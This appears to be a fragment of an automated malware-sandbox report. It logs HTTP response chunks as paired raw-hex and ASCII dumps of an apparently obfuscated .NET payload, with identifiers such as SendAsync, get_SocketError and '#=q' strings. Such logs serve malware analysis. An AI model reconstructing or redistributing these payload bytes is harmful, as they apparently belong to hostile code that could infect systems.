2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 36 2d 2d 2d 2d 2d 34 2d 33 32 38
                        Data Ascii: 43F-----21C2D-326262A7D95-----42BF8---33--9--1F---------------2-27B95-----4-32886-----A743F-----21A2D-326262A7D95-----42BF8---33--9--1F---------------2-27B96-----4-32885-----A743C-----21C2D-326262A7D96-----42BF8---33--9--1F---------------2-27B96-----4-328
                        2021-09-14 14:17:56 UTC91INData Raw: 45 2d 31 2d 2d 2d 41 2d 32 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 36 35 38 31 39 32 44 31 37 32 36 32 36 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 32 37 42 42 34 2d 2d 2d 2d 2d 34 38 45 42 37 33 33 35 41 32 42 2d 41 2d 41 32 42 43 39 37 44 42 31 2d 2d 2d 2d 2d 34 32 42 45 34 2d 32 37 42 39 37 2d 2d 2d 2d 2d 34 31 37 32 44 2d 36 32 36 2d 39 32 43 31 32 32 42 2d 33 2d 44 32 42 46 38 2d 39 2d 32 2d 32 37 42 42 34 2d 2d 2d 2d 2d 34 36 46 41 44 2d 31 2d 2d 2d 36 2d 32 31 36 31 41 32 44 31 45 32 36 32 36 2d 32 37 43 42 34 2d 2d 2d 2d 2d 34 31 36 32 38 2d 36 2d 2d 2d 2d 32 42 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 32 37 42 41 2d 2d 2d 2d 2d 2d 34 33 32 2d 45 32 42 2d 37 37 44 42 38 2d 2d 2d 2d 2d 34 32 42 44 44 32 38 45 37 2d 31 2d 2d 2d 41 2d 36 2d 35 2d 34 35 39
                        Data Ascii: E-1---A-2-27BB1-----4-658192D172626-27BB1-----4-27BB4-----48EB7335A2B-A-A2BC97DB1-----42BE4-27B97-----4172D-626-92C122B-3-D2BF8-9-2-27BB4-----46FAD-1---6-2161A2D1E2626-27CB4-----41628-6----2B-27BB1-----4-27BA------432-E2B-77DB8-----42BDD28E7-1---A-6-5-459
                        2021-09-14 14:17:56 UTC98INData Raw: 42 35 34 42 43 43 41 43 35 31 33 37 41 44 42 44 45 38 37 44 44 35 42 36 31 39 37 36 34 38 41 43 34 37 42 34 38 36 35 38 31 34 42 42 46 41 33 32 2d 38 44 31 33 41 41 44 35 43 37 31 45 37 2d 46 41 42 36 46 36 33 32 43 45 33 43 31 38 37 46 45 45 45 43 39 35 34 42 42 46 41 33 45 39 44 45 36 35 2d 35 45 38 34 42 42 46 41 33 37 36 34 37 34 45 38 42 32 43 43 31 42 39 46 35 34 42 42 46 41 33 46 46 44 43 36 34 41 34 43 39 39 37 35 41 43 36 45 39 45 46 42 31 43 44 38 33 33 43 39 46 43 42 36 37 35 42 44 31 38 37 45 37 44 46 34 42 42 46 41 33 43 42 43 43 31 46 39 39 33 45 42 45 36 37 42 39 37 2d 46 43 37 37 39 38 31 2d 32 44 41 31 41 37 31 39 33 44 38 2d 31 37 41 37 39 2d 38 36 34 35 45 36 46 43 32 37 34 42 42 46 41 33 37 42 41 42 35 2d 34 46 44 2d 2d 35 39 42 43 38
                        Data Ascii: B54BCCAC5137ADBDE87DD5B6197648AC47B4865814BBFA32-8D13AAD5C71E7-FAB6F632CE3C187FEEEC954BBFA3E9DE65-5E84BBFA376474E8B2CC1B9F54BBFA3FFDC64A4C9975AC6E9EFB1CD833C9FCB675BD187E7DF4BBFA3CBCC1F993EBE67B97-FC77981-2DA1A7193D8-17A79-8645E6FC274BBFA37BAB5-4FD--59BC8
                        2021-09-14 14:17:56 UTC105INData Raw: 36 2d 36 2d 2d 31 31 2d 37 34 44 2d 36 2d 36 2d 2d 31 38 2d 37 34 44 2d 36 2d 36 2d 2d 32 35 2d 37 34 44 2d 36 2d 36 2d 2d 33 2d 2d 37 35 39 2d 2d 2d 36 2d 2d 33 35 2d 37 35 39 2d 2d 31 32 2d 2d 34 37 2d 37 34 42 2d 37 31 32 2d 2d 35 36 2d 37 34 42 2d 37 31 32 2d 2d 35 46 2d 37 34 42 2d 37 31 32 2d 2d 36 39 2d 37 34 42 2d 37 31 32 2d 2d 37 34 2d 37 34 42 2d 37 31 32 2d 2d 38 2d 2d 37 38 45 2d 37 31 32 2d 2d 41 31 2d 37 38 45 2d 37 31 32 2d 2d 41 45 2d 37 38 45 2d 37 31 32 2d 2d 42 42 2d 37 38 45 2d 37 31 32 2d 2d 43 32 2d 37 38 45 2d 37 31 32 2d 2d 44 37 2d 37 38 45 2d 37 31 32 2d 2d 45 43 2d 37 38 45 2d 37 31 32 2d 2d 46 38 2d 37 38 45 2d 37 31 32 2d 2d 2d 38 2d 38 38 45 2d 37 2d 36 2d 2d 31 33 2d 38 35 39 2d 2d 2d 36 2d 2d 31 41 2d 38 35 39 2d 2d 2d 36
                        Data Ascii: 6-6--11-74D-6-6--18-74D-6-6--25-74D-6-6--3--759---6--35-759--12--47-74B-712--56-74B-712--5F-74B-712--69-74B-712--74-74B-712--8--78E-712--A1-78E-712--AE-78E-712--BB-78E-712--C2-78E-712--D7-78E-712--EC-78E-712--F8-78E-712---8-88E-7-6--13-859---6--1A-859---6
                        2021-09-14 14:17:56 UTC113INData Raw: 2d 35 37 32 36 33 32 2d 31 32 35 2d 2d 46 38 32 44 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 2d 2d 41 42 32 36 36 37 2d 2d 32 37 2d 2d 32 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 2d 2d 44 42 32 36 36 37 2d 2d 32 37 2d 2d 36 2d 32 45 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 31 38 46 33 31 41 44 45 2d 2d 32 37 2d 2d 38 34 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 42 34 33 32 37 33 39 2d 31 32 38 2d 2d 39 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 35 31 32 37 2d 35 2d 31 32 38 2d 2d 44 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 37 37 32 37 33 44 2d 31 32 39 2d 2d 46 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 39 45 32 37 36 37 2d 2d 32 41 2d 2d 2d 38 32 46 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 41 39 32 37 34 32 2d 31 32 41 2d 2d 38 43 32 46 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 2d 41
                        Data Ascii: -572632-125--F82D---------6--AB2667--27--2C2E---------6--DB2667--27--6-2E---------618F31ADE--27--842E--------66-B432739-128--9C2E--------66-35127-5-128--DC2E--------66-377273D-129--FC2E--------66-39E2767--2A---82F--------66-3A92742-12A--8C2F--------66-3-A
                        2021-09-14 14:17:56 UTC120INData Raw: 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 42 31 37 41 33 43 2d 32 33 31 2d 31 36 34 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 46 35 37 41 33 43 2d 32 33 31 2d 31 39 2d 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 33 39 37 42 33 43 2d 32 33 31 2d 31 42 43 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 37 44 37 42 46 39 2d 33 33 31 2d 31 45 38 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 41 44 37 42 46 39 2d 33 33 31 2d 31 31 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 44 44 37 42 46 39 2d 33 33 31 2d 31 34 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 2d 44 37 43 46 39 2d 33 33 31 2d 31 37 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 35 31 37 43 46 39 2d 33 33 31 2d 31 41 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 39 35 37 43 46 39 2d 33 33 31 2d 31 44 38 41 34 2d 2d
                        Data Ascii: 3--------16--B17A3C-231-164A3--------16--F57A3C-231-19-A3--------16--397B3C-231-1BCA3--------16--7D7BF9-331-1E8A3--------16--AD7BF9-331-118A4--------16--DD7BF9-331-148A4--------16---D7CF9-331-178A4--------16--517CF9-331-1A8A4--------16--957CF9-331-1D8A4--
                        2021-09-14 14:17:56 UTC127INData Raw: 2d 2d 44 36 46 2d 2d 2d 2d 2d 31 2d 2d 35 39 36 46 2d 2d 2d 2d 2d 31 2d 2d 34 44 37 2d 2d 2d 2d 2d 2d 31 2d 2d 38 35 37 2d 2d 2d 2d 2d 2d 31 2d 2d 41 31 37 2d 2d 2d 2d 2d 2d 32 2d 2d 42 44 37 2d 2d 2d 2d 2d 2d 31 2d 2d 44 39 37 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 39 37 31 2d 2d 2d 2d 2d 31 2d 2d 33 39 37 31 2d 2d 2d 2d 2d 31 2d 2d 38 35 37 31 2d 2d 2d 2d 2d 31 2d 2d 41 31 37 31 2d 2d 2d 2d 2d 32 2d 2d 42 44 37 31 2d 2d 2d 2d 2d 31 2d 2d 46 35 37 31 2d 2d 2d 2d 2d 32 2d 2d 31 31 37 32 2d 2d 2d 2d 2d 31 2d 2d 2d 31 35 38 2d 2d 2d 2d 2d 31 2d 2d 34 39 37 32 2d 2d 2d 2d 2d 31 2d 2d 36 35 37 32 2d 2d 2d 2d 2d 32 2d 2d 38 31 37 32 2d 2d 2d 2d 2d 31 2d 2d 43 39 37 33 2d 2d 2d 2d 2d 31 2d 2d 2d 31 37 34 2d 2d 2d 2d 2d 31 2d 2d 34 44 37 34 2d 2d 2d 2d 2d 31 2d 2d 38 35
                        Data Ascii: --D6F-----1--596F-----1--4D7------1--857------1--A17------2--BD7------1--D97------2---971-----1--3971-----1--8571-----1--A171-----2--BD71-----1--F571-----2--1172-----1---158-----1--4972-----1--6572-----2--8172-----1--C973-----1---174-----1--4D74-----1--85
                        2021-09-14 14:17:56 UTC134INData Raw: 2d 44 38 41 39 33 41 2d 41 36 43 2d 2d 39 44 41 39 39 43 2d 2d 36 43 2d 2d 39 37 41 41 33 2d 2d 46 31 39 2d 36 46 33 31 41 32 45 31 33 34 39 2d 2d 46 33 31 41 36 37 2d 2d 46 39 2d 35 46 33 31 41 43 43 31 32 37 31 2d 35 46 33 31 41 39 38 2d 31 37 31 2d 35 45 38 31 43 41 36 2d 2d 32 31 2d 35 46 33 31 41 42 41 31 33 41 31 2d 34 46 33 31 41 43 34 31 33 44 39 2d 34 46 35 42 31 44 35 31 33 44 31 2d 34 2d 41 42 32 44 42 31 33 42 39 2d 34 46 33 31 41 46 35 31 33 41 39 2d 34 31 34 42 32 39 43 2d 2d 41 39 2d 34 32 35 42 32 46 43 31 33 44 31 2d 34 46 33 31 41 46 43 31 33 44 39 2d 34 46 33 31 41 2d 33 31 34 43 39 2d 34 31 34 42 32 39 43 2d 2d 43 39 2d 34 32 35 42 32 46 43 31 33 35 39 2d 35 37 46 41 39 35 36 2d 34 37 31 2d 35 46 33 31 41 36 37 2d 2d 37 31 2d 35 33 33
                        Data Ascii: -D8A93A-A6C--9DA99C--6C--97AA3--F19-6F31A2E1349--F31A67--F9-5F31ACC1271-5F31A98-171-5E81CA6--21-5F31ABA13A1-4F31AC413D9-4F5B1D513D1-4-AB2DB13B9-4F31AF513A9-414B29C--A9-425B2FC13D1-4F31AFC13D9-4F31A-314C9-414B29C--C9-425B2FC1359-57FA956-471-5F31A67--71-533
                        2021-09-14 14:17:56 UTC141INData Raw: 42 34 36 37 32 36 31 36 44 36 35 2d 2d 35 33 37 34 36 31 36 33 36 42 35 34 37 32 36 31 36 33 36 35 2d 2d 34 34 36 46 37 35 36 32 36 43 36 35 2d 2d 35 32 36 35 36 33 37 34 36 31 36 45 36 37 36 43 36 35 2d 2d 35 33 36 39 37 41 36 35 2d 2d 34 35 36 45 37 35 36 44 2d 2d 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 2d 2d 35 33 37 2d 36 35 36 33 36 39 36 31 36 43 34 36 36 46 36 43 36 34 36 35 37 32 2d 2d 34 35 37 36 36 35 36 45 37 34 34 31 37 32 36 37 37 33 2d 2d 34 35 37 36 36 35 36 45 37 34 34 38 36 31 36 45 36 34 36 43 36 35 37 32 2d 2d 34 35 37 36 36 35 36 45 37 34 34 38 36 31 36 45 36 34 36 43 36 35 37 32 36 2d 33 31 2d 2d 34 35 37 38 36 33 36 35 37 2d 37 34 36 39 36 46 36 45 2d 2d 34 37 34 33 2d 2d 34 37 37 35 36 39 36 34 2d 2d 34 39
                        Data Ascii: B4672616D65--537461636B5472616365--446F75626C65--52656374616E676C65--53697A65--456E756D--456E7669726F6E6D656E74--537-656369616C466F6C646572--4576656E7441726773--4576656E7448616E646C6572--4576656E7448616E646C65726-31--457863657-74696F6E--4743--47756964--49
                        2021-09-14 14:17:56 UTC149INData Raw: 36 34 39 37 37 33 37 34 34 37 33 36 38 36 37 34 45 35 37 34 37 37 36 36 35 34 31 37 36 34 32 35 31 33 44 2d 2d 32 33 33 44 37 31 36 38 34 35 33 32 35 2d 33 32 36 42 33 34 33 36 36 41 36 39 35 33 35 33 36 41 34 46 33 38 33 36 36 37 33 33 36 45 34 32 33 31 34 44 36 42 34 43 34 37 34 33 33 39 35 46 33 33 36 31 37 36 34 34 37 2d 34 39 33 37 36 39 35 39 36 32 35 35 34 38 37 32 33 35 36 37 33 44 2d 2d 32 33 33 44 37 31 37 36 35 38 32 34 34 41 33 32 33 34 37 32 34 39 33 2d 36 35 34 41 33 2d 36 37 35 37 36 36 34 31 33 36 34 33 34 35 36 34 37 41 35 36 34 41 34 45 33 37 36 32 35 31 34 45 35 46 35 39 35 34 37 35 35 33 33 39 33 38 34 45 33 2d 37 39 37 39 34 44 35 39 35 2d 36 46 33 44 2d 2d 32 33 33 44 37 31 33 36 34 45 36 35 36 45 36 36 35 31 36 32 37 41 35 31 35 39
                        Data Ascii: 6497737447368674E57477665417642513D--233D716845325-326B34366A6953536A4F383667336E42314D6B4C4743395F336176447-493769596255487235673D--233D717658244A323472493-654A3-67576641364345647A564A4E3762514E5F5954755339384E3-79794D595-6F3D--233D71364E656E6651627A5159
                        2021-09-14 14:17:56 UTC156INData Raw: 33 33 37 35 46 37 41 34 43 34 33 34 45 36 34 34 36 34 33 36 39 34 38 37 34 35 2d 34 38 33 31 37 39 35 32 33 39 33 38 37 37 33 37 35 34 36 32 36 44 37 32 35 33 33 34 37 36 35 35 34 35 33 44 2d 2d 34 35 36 45 36 34 34 39 36 45 37 36 36 46 36 42 36 35 2d 2d 32 33 33 44 37 31 33 39 33 35 37 37 33 39 34 44 37 2d 36 31 34 37 33 34 35 41 36 33 36 37 36 42 34 37 36 37 36 45 36 44 35 31 34 39 35 34 34 46 36 34 34 38 37 32 33 35 34 39 36 31 34 43 35 38 34 34 33 38 36 31 34 33 33 36 36 46 33 33 34 35 37 31 37 34 34 35 33 2d 35 2d 35 31 33 44 2d 2d 34 39 36 45 37 36 36 46 36 42 36 35 2d 2d 32 33 33 44 37 31 37 38 37 2d 33 36 36 33 37 34 33 34 34 41 34 37 34 43 36 31 34 44 34 34 36 32 37 37 36 37 33 36 36 36 36 42 37 32 34 39 34 35 37 37 33 44 33 44 2d 2d 32 33 33 44
                        Data Ascii: 3375F7A4C434E6446436948745-483179523938773754626D7253347655453D--456E64496E766F6B65--233D71393577394D7-6147345A63676B47676E6D5149544F6448723549614C5844386143366F33457174453-5-513D--496E766F6B65--233D71787-366374344A474C614D4462776736666B724945773D3D--233D
                        2021-09-14 14:17:56 UTC163INData Raw: 36 36 37 33 44 33 44 2d 2d 34 35 36 45 37 34 37 32 37 39 34 35 37 38 36 39 37 33 37 34 37 33 2d 2d 34 37 36 35 37 34 34 35 36 45 37 34 37 32 36 39 36 35 37 33 2d 2d 32 33 33 44 37 31 33 32 36 37 37 34 36 38 37 36 34 32 33 36 33 32 36 45 33 2d 33 37 36 36 35 39 35 36 35 34 37 38 33 35 36 36 37 37 34 39 37 31 37 38 34 32 34 31 36 46 33 31 37 34 35 46 36 38 37 33 32 34 36 39 36 43 33 39 34 31 36 33 32 34 33 34 34 36 35 39 35 46 34 37 37 37 33 44 2d 2d 32 33 33 44 37 31 37 32 33 35 37 31 37 2d 37 36 34 46 35 2d 36 45 34 43 37 38 34 43 37 2d 33 36 36 31 34 37 36 42 36 36 34 31 34 44 33 37 37 37 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 36 33 35 37 41 36 45 34 36 36 37 33 2d 35 46 33 32 33 33 33 34 36 45 36 36 36 45 36 38 34 43 33 34 34 39 33 38 37 39 35 32
                        Data Ascii: 6673D3D--456E747279457869737473--476574456E7472696573--233D7132677468764236326E3-37665956547835667749717842416F31745F687324696C394163243446595F47773D--233D717235717-764F5-6E4C784C7-3661476B66414D3777513D3D--233D7136357A6E46673-5F3233346E666E684C3449387952
                        2021-09-14 14:17:56 UTC170INData Raw: 37 34 44 33 33 36 44 34 46 37 36 36 36 37 34 37 32 37 37 33 44 2d 2d 32 33 33 44 37 31 36 42 36 33 35 36 36 42 34 41 37 33 36 42 37 35 34 37 34 31 33 34 36 46 33 37 36 42 34 37 37 35 34 45 33 37 33 39 36 39 33 31 37 37 33 44 33 44 2d 2d 32 33 33 44 37 31 36 34 33 33 34 39 37 34 36 34 33 31 34 35 34 43 34 34 35 2d 34 38 34 41 37 38 36 38 34 43 37 36 37 34 33 2d 37 39 33 31 34 45 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 35 38 36 42 36 37 37 2d 36 36 36 37 36 38 37 36 35 34 34 42 34 34 35 41 34 37 36 43 35 38 34 32 34 37 34 39 33 34 37 38 33 39 37 36 36 35 35 31 34 46 33 34 34 41 36 36 36 41 34 36 33 37 34 37 35 37 33 32 34 35 34 33 37 37 33 39 32 34 34 43 33 33 34 35 37 36 37 39 34 42 35 41 34 37 34 46 36 45 37 41 36 39 37 37 35 38 34 35 33 32 35 38 37 32
                        Data Ascii: 74D336D4F76667472773D--233D716B63566B4A736B754741346F376B47754E37396931773D3D--233D71643349746431454C445-484A78684C76743-79314E513D3D--233D71586B677-66676876544B445A476C584247493478397665514F344A666A463747573245437739244C334576794B5A474F6E7A69775845325872
                        2021-09-14 14:17:56 UTC178INData Raw: 2d 34 32 35 32 34 41 36 34 34 31 37 33 35 39 36 43 35 38 35 33 35 32 35 35 36 33 37 37 36 39 37 41 37 37 33 44 2d 2d 32 33 33 44 37 31 36 46 37 36 36 33 33 2d 34 41 33 37 34 42 33 36 36 32 33 39 34 35 37 31 35 46 34 33 33 2d 34 42 33 34 33 36 37 32 36 32 36 44 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 37 36 36 32 35 34 34 45 34 32 36 39 36 38 34 37 33 32 37 41 34 31 35 32 37 33 36 35 37 37 36 42 35 32 34 39 34 36 35 34 35 33 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 35 36 41 33 33 37 37 37 36 34 41 35 38 36 43 36 45 37 32 34 37 36 44 35 32 36 45 34 42 35 35 34 38 37 32 35 46 33 31 35 33 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 34 35 34 39 35 2d 36 33 36 45 36 34 34 46 34 43 37 32 35 36 33 32 34 37 34 41 36 44 36 45 36 46 33 37 37 41 34 42 37 34 34 32
                        Data Ascii: -42524A644173596C585352556377697A773D--233D716F76633-4A374B36623945715F433-4B343672626D673D3D--233D717662544E42696847327A41527365776B5249465453513D3D--233D71356A3377764A586C6E72476D526E4B5548725F3153513D3D--233D7145495-636E644F4C725632474A6D6E6F377A4B7442
                        2021-09-14 14:17:56 UTC185INData Raw: 37 36 41 35 46 36 37 37 34 33 31 33 32 34 35 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 36 34 34 39 36 44 35 2d 34 31 35 39 33 31 36 46 33 33 35 39 36 38 36 32 34 43 37 34 37 35 36 42 37 37 34 33 35 31 33 39 33 31 36 33 34 39 35 33 36 31 36 35 34 39 34 35 35 37 35 32 34 42 35 33 35 39 37 32 34 37 35 41 33 33 36 34 35 34 35 36 36 45 36 42 35 39 33 44 2d 2d 32 33 33 44 37 31 35 46 36 42 34 37 37 39 34 35 36 45 33 38 34 42 37 32 36 44 34 32 36 44 37 34 33 35 34 44 33 31 34 45 33 39 36 33 35 35 35 33 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 32 34 36 45 36 41 36 46 37 2d 35 32 37 32 35 2d 36 32 36 43 37 31 36 35 32 34 37 39 37 32 37 33 32 34 37 32 37 33 37 35 33 35 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 37 41 36 31 33 37 34 46 33 31 34 31 34 38 37 32 37 32
                        Data Ascii: 76A5F6774313245513D3D--233D7164496D5-4159316F335968624C74756B77435139316349536165494557524B535972475A336454566E6B593D--233D715F6B4779456E384B726D426D74354D314E39635553673D3D--233D71246E6A6F7-52725-626C7165247972732472737535513D3D--233D717A61374F3141487272
                        2021-09-14 14:17:56 UTC192INData Raw: 34 35 37 37 34 33 36 36 36 35 32 36 32 36 35 35 37 36 46 37 38 33 31 37 35 34 45 33 33 37 36 36 36 35 33 35 2d 33 35 37 36 35 46 35 37 35 46 37 37 36 33 33 44 2d 2d 32 33 33 44 37 31 33 2d 35 2d 34 44 36 33 35 38 35 31 34 41 37 38 36 33 34 43 34 43 37 32 33 31 37 33 35 39 34 46 33 2d 36 36 37 2d 37 39 36 38 35 2d 36 41 35 35 37 37 36 41 35 31 37 34 34 39 36 45 34 43 35 46 37 36 34 41 35 2d 35 31 35 33 36 37 34 33 37 33 36 36 36 39 36 46 33 44 2d 2d 32 33 33 44 37 31 34 38 36 31 37 35 36 39 36 41 36 44 36 38 33 32 36 45 34 41 33 35 36 42 34 38 34 46 33 36 36 36 35 34 35 39 34 32 36 45 34 41 34 36 35 41 34 42 36 42 36 36 37 41 36 42 35 37 37 34 33 35 36 37 34 32 33 34 36 44 35 39 35 33 33 35 34 46 34 43 34 46 35 36 36 33 33 44 2d 2d 32 33 33 44 37 31 37 2d
                        Data Ascii: 457743666526265576F7831754E337666535-35765F575F77633D--233D713-5-4D6358514A78634C4C723173594F3-667-79685-6A55776A5174496E4C5F764A5-515367437366696F3D--233D71486175696A6D68326E4A356B484F36665459426E4A465A4B6B667A6B5774356742346D5953354F4C4F56633D--233D717-
                        2021-09-14 14:17:56 UTC199INData Raw: 38 36 31 34 35 35 37 36 45 33 39 37 39 35 41 36 39 34 39 37 39 36 34 34 35 34 33 36 36 33 36 33 39 32 34 36 42 37 34 36 41 33 2d 34 39 35 2d 34 34 33 35 37 37 34 31 37 37 34 33 33 32 34 38 33 35 34 33 36 33 33 38 34 33 32 34 34 43 2d 2d 32 33 33 44 37 31 37 31 37 33 33 31 36 44 36 46 34 46 32 34 36 44 35 39 36 31 35 33 33 37 33 32 34 46 35 38 34 46 35 37 36 35 33 2d 35 41 33 36 34 37 37 39 36 33 37 33 36 43 34 35 36 32 33 36 36 35 33 39 34 39 37 2d 36 46 37 39 33 37 37 2d 37 2d 35 37 33 2d 34 46 33 35 36 31 36 32 34 39 37 2d 33 2d 33 35 36 31 36 41 37 36 33 38 36 34 36 46 37 31 36 34 34 41 35 41 34 38 36 43 34 45 33 33 36 33 34 42 2d 2d 32 33 33 44 37 31 37 39 34 35 34 38 33 35 33 34 34 39 35 37 32 34 36 36 33 39 36 36 35 35 34 41 36 32 33 37 34 36 34 46
                        Data Ascii: 86145576E39795A694979644543663639246B746A3-495-44357741774332483543633843244C--233D717173316D6F4F246D59615337324F584F57653-5A36477963736C4562366539497-6F79377-7-573-4F356162497-3-35616A7638646F71644A5A486C4E33634B--233D717945483534495724663966554A6237464F
                        2021-09-14 14:17:56 UTC207INData Raw: 35 36 34 36 44 34 37 34 31 33 44 2d 2d 32 33 33 44 37 31 34 36 36 43 37 41 32 34 32 34 37 36 36 38 36 43 37 32 36 45 35 41 36 32 33 37 35 39 34 46 36 41 36 39 33 2d 36 35 34 36 35 46 35 31 35 41 34 32 37 41 36 42 34 46 36 31 36 41 35 34 33 2d 37 37 33 33 35 35 36 46 35 31 36 32 36 37 36 45 35 38 35 36 34 39 34 31 33 44 2d 2d 32 33 33 44 37 31 36 39 36 42 34 32 35 38 35 46 34 33 36 44 35 33 32 34 35 41 37 41 35 36 34 31 37 35 37 31 32 34 36 45 35 31 34 41 34 32 34 34 37 37 36 44 34 43 36 44 33 35 34 37 36 35 36 35 33 31 36 39 35 2d 36 43 35 2d 37 35 37 36 34 39 33 31 33 38 33 38 34 35 36 41 36 46 33 44 2d 2d 32 33 33 44 37 31 34 39 34 46 35 38 35 46 37 32 37 37 34 38 37 32 35 33 35 46 35 32 34 43 34 36 34 43 33 32 36 39 36 37 37 41 35 32 37 33 35 35 35 31
                        Data Ascii: 5646D47413D--233D71466C7A242476686C726E5A6237594F6A693-65465F515A427A6B4F616A543-7733556F5162676E585649413D--233D71696B42585F436D53245A7A56417571246E514A4244776D4C6D3547656531695-6C5-757649313838456A6F3D--233D71494F585F72774872535F524C464C3269677A52735551
                        2021-09-14 14:17:56 UTC214INData Raw: 44 37 31 36 34 33 38 35 37 34 39 35 41 34 46 33 38 36 36 33 36 34 39 35 32 37 31 36 34 35 35 36 44 37 36 37 38 36 31 37 37 36 41 33 31 37 37 33 44 33 44 2d 2d 32 33 33 44 37 31 34 39 35 41 35 2d 33 38 34 39 35 38 33 36 33 2d 36 37 35 33 35 39 34 36 33 38 33 32 36 42 37 35 35 41 36 35 36 41 36 44 36 37 33 38 37 2d 34 46 36 46 35 38 36 36 34 35 34 32 36 33 37 41 36 31 37 2d 35 34 35 34 37 37 36 37 37 32 35 37 34 44 32 34 36 36 34 44 33 44 2d 2d 32 33 33 44 37 31 35 35 35 32 34 39 37 38 34 44 34 46 34 37 33 2d 34 38 34 39 36 44 37 37 34 35 35 2d 33 34 34 31 33 36 37 41 34 35 36 39 35 2d 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 35 35 33 31 36 37 33 36 36 44 33 31 34 33 36 39 34 41 33 35 37 39 37 41 34 43 34 35 34 33 36 46 37 38 33 31 36 38 34 32 37 32 37 37
                        Data Ascii: D71643857495A4F38663649527164556D767861776A31773D3D--233D71495A5-384958363-6753594638326B755A656A6D67387-4F6F58664542637A617-5454776772574D24664D3D--233D71555249784D4F473-48496D77455-3441367A45695-673D3D--233D71553167366D3143694A35797A4C45436F783168427277
                        2021-09-14 14:17:56 UTC221INData Raw: 45 33 39 36 45 33 34 36 36 34 42 34 31 37 33 37 36 35 37 35 34 33 39 36 33 36 39 37 33 36 31 34 38 35 34 35 46 35 2d 36 37 37 36 36 33 34 37 34 31 34 45 36 45 36 34 33 36 36 46 33 44 2d 2d 32 33 33 44 37 31 34 42 33 35 34 44 36 36 33 39 37 35 37 38 34 34 34 33 36 41 37 37 34 34 35 32 36 36 37 39 34 41 35 31 33 36 36 42 37 2d 33 38 34 31 33 44 33 44 2d 2d 32 33 33 44 37 31 34 36 35 41 33 38 37 38 36 44 33 36 33 39 34 33 36 34 33 2d 34 33 33 35 33 35 34 39 37 2d 33 32 34 46 35 32 36 36 33 37 34 45 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 35 36 35 38 34 32 35 46 37 39 33 33 36 35 34 45 35 46 37 33 37 2d 33 31 32 34 34 44 36 34 33 39 35 35 36 46 34 41 36 35 35 39 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 33 33 37 36 41 36 36 36 33 36 35 34 34 37 2d 37 36
                        Data Ascii: E396E34664B4173765754396369736148545F5-67766347414E6E64366F3D--233D714B354D6639757844436A77445266794A51366B7-38413D3D--233D71465A38786D363943643-433535497-324F5266374E673D3D--233D715658425F7933654E5F737-31244D6439556F4A6559513D3D--233D7133376A666365447-76
                        2021-09-14 14:17:56 UTC228INData Raw: 33 36 35 36 39 37 36 36 35 34 31 37 33 37 39 36 45 36 33 2d 2d 36 37 36 35 37 34 35 46 35 33 36 46 36 33 36 42 36 35 37 34 34 35 37 32 37 32 36 46 37 32 2d 2d 36 37 36 35 37 34 35 46 34 43 36 31 37 33 37 34 34 46 37 2d 36 35 37 32 36 31 37 34 36 39 36 46 36 45 2d 2d 36 37 36 35 37 34 35 46 34 32 37 39 37 34 36 35 37 33 35 34 37 32 36 31 36 45 37 33 36 36 36 35 37 32 37 32 36 35 36 34 2d 2d 36 37 36 35 37 34 35 46 34 32 37 35 36 36 36 36 36 35 37 32 2d 2d 35 32 36 35 37 33 36 39 37 41 36 35 2d 2d 34 33 36 46 36 43 36 43 36 35 36 33 37 34 2d 2d 36 37 36 35 37 34 35 46 34 46 36 36 36 36 37 33 36 35 37 34 2d 2d 35 33 36 35 36 45 36 34 34 31 37 33 37 39 36 45 36 33 2d 2d 35 2d 37 34 37 32 35 34 36 46 35 33 37 34 37 32 37 35 36 33 37 34 37 35 37 32 36 35 2d 2d
                        Data Ascii: 3656976654173796E63--6765745F536F636B65744572726F72--6765745F4C6173744F7-65726174696F6E--6765745F42797465735472616E73666572726564--6765745F427566666572--526573697A65--436F6C6C656374--6765745F4F6666736574--53656E644173796E63--5-7472546F537472756374757265--
